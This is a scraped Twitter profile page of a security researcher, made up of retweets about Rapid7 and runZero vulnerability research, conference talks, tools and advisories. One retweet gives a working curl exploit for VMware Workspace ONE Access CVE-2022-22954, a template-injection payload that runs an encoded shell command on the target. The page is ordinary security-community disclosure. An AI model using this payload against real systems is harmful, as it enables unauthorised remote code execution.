Matthew Kienow's (@hacksforprofit) Twitter Profile
Matthew Kienow

@hacksforprofit

hacks for fun and profit / software engineer / security researcher

PGP: 9DCD 23A2 0181 B684 C21C 0ED2 9903 D880 6069 F788

ID: 2759927893

Link: https://keybase.io/inokii | Joined: 23-08-2014 19:01:00

789 Tweets

459 Followers

539 Following

Caitlin Condon (@catc0n) 's Twitter Profile Photo

Rapid7's vulnerability intelligence report is out today and features analysis from folks like Jacob Baines, Spencer McIntyre, Unsolicited Dog Pics and a bunch of the Metasploit Project team. We tracked hundreds of data points across 50 high-impact vulns. Key points: (1/n) rapid7.com/info/2021-vuln…

wvu (@wvuuuuuuuuuuuuu) 's Twitter Profile Photo

Exploit for VMware Workspace ONE Access CVE-2022-22954: curl -kv https://192.168.0.240/catalog-portal/ui/oauth/verify -H "Host: lol" -Gd error= --data-urlencode 'deviceUdid=${"freemarker.template.utility.Execute"?new()("bash -c {eval,$({echo,aWQ7dW5hbWUgLWE=}|{base64,-d})}")}'

Caitlin Condon (@catc0n) 's Twitter Profile Photo

Ahoy! I'm looking for an attack + vulnerability research leader to join Ron Bowes (defunct) and Stephen Fewer in driving 0day + n-day research, identifying/developing new attack techniques, and helping set overall research strategy. U.S. ET time zone, job description coming soon. DMs open!

Marcello (@byt3bl33d3r) 's Twitter Profile Photo

Really excited to be speaking at DEF CON this year!

My talk is titled "SpamChannel: Spoofing Emails from +2M Domains and Virtually becoming Satan"

Love/hate Email security? Want your phishing campaigns to be a whole lot easier? you should def come to my talk! 😈
#defcon31

Caitlin Condon (@catc0n) 's Twitter Profile Photo

Full Rapid7 analysis of PAN-OS CVE-2024-3400 now available from Stephen Fewer and our stellar new research teammate @ChairNectar! Spoiler: It's a two-vuln exploit chain. attackerkb.com/topics/SSTk336…

Caitlin Condon (@catc0n) 's Twitter Profile Photo

I see "Not all vulnerabilities are created equal" pop up a lot these days in marketing materials for various security companies. We may not have truly been the first to coin that phrase, but AttackerKB's been using it since early 2020! attackerkb.com/about

Caitlin Condon (@catc0n) 's Twitter Profile Photo

Rapid7's 2024 Attack Intelligence Report was released today and includes insights from 14 months of vulnerability and exploit analysis, thousands of ransomware incidents, 180+ APT campaigns, and a year+ of Rapid7 incident response findings. rapid7.com/research/repor…

Caitlin Condon (@catc0n) 's Twitter Profile Photo

CVE and vendor advisory now available on the #FortiManager 0day that's been knocking around the rumor mill (and evidently some Fortinet customers' email inboxes) for a while. Mitigate immediately, but IOCs need investigating, too. rapid7.com/blog/post/2024…

Stephen Fewer (@stephenfewer) 's Twitter Profile Photo

We have just published our AttackerKB Rapid7 Analysis for CVE-2024-47575, the recent FortiManager 0day, aka FortiJump 🔥 Read our full technical analysis; detailing firmware decryption, protocol analysis, and unauthenticated RCE 🚀 attackerkb.com/topics/OFBGprm…

Deral Heiland (@percent_x) 's Twitter Profile Photo

I spoke with Robert Vamosi on the ErrorCode podcast a while back on "Hacking Cellular-Enabled IoT Devices". We had a fun conversation. The podcast was just published so please check it out - errorcode.podbean.com/e/ep-52-hackin…

HD Moore (@hdmoore) 's Twitter Profile Photo

A PSA for why you should probably not use Postman (it can leak secrets to them): anonymousdata.medium.com/postman-is-log…

HD Moore (@hdmoore) 's Twitter Profile Photo

I'm excited to announce our "Out-of-Band" series, focused on the security risks of management devices like BMCs, serial servers, and KVMs. "Out-of-Band, Part 1: The new generation of IP KVMs and how to find them" is now live at: runzero.com/blog/oob-p1-ip…

runZero, Inc. (@runzeroinc) 's Twitter Profile Photo

🗣️ Happening today at Black Hat Arsenal! Join Matthew Kienow & Deral Heiland at 11am PDT for a live demo of Akheron Proxy, a tool for bridging, capturing, replaying, and manipulating UART inter-chip communications. 📍 Business Hall, Arsenal Station 9 🔗 runzero.com/black-hat-arse…

runZero, Inc. (@runzeroinc) 's Twitter Profile Photo

🎙 Hacker Summer Camp recap drops today on runZero Hour!

✅ HD Moore on SSH vulns + SSHamble
✅ Akheron Proxy w/ Matthew Kienow & Deral Heiland
✅ Tod Beardsley (@todb@infosec.exchange) unveils EPSS Pulse
✅ Rob King on OT detection across protocol gateways.

📅 Aug 20 | 10AM PT
🔗 runzero.com/research/runze…

runZero, Inc. (@runzeroinc) 's Twitter Profile Photo

🎥 Missed runZero Hour live? Catch it on demand! We recap Hacker Summer Camp highlights: ✅ HD Moore on SSH vulns + SSHamble updates ✅ Akheron Proxy w/ Matthew Kienow & Deral Heiland ✅ Tod Beardsley (@todb@infosec.exchange) unveils EPSS Pulse ✅ OT protocol insights from Rob King 👉 runzero.com/resources/runz…

Stephen Fewer (@stephenfewer) 's Twitter Profile Photo

An unauthenticated RCE PoC for the React vuln (CVE-2025-55182) is now public. Confirmed to work on my test setup (Next.js 16.0.6 with React 19.2.0).

runZero, Inc. (@runzeroinc) 's Twitter Profile Photo

EOS edge devices exposed to the internet = a 'please hack me' sign on your front door. CISA agrees. And that's what BOD 26-02 is all about.

In our latest blog, Tod Beardsley (@todb@infosec.exchange), Matthew Kienow & Colin Dupreay break down how runZero customers can get ahead.

👉 runzero.com/blog/cisa-bod-…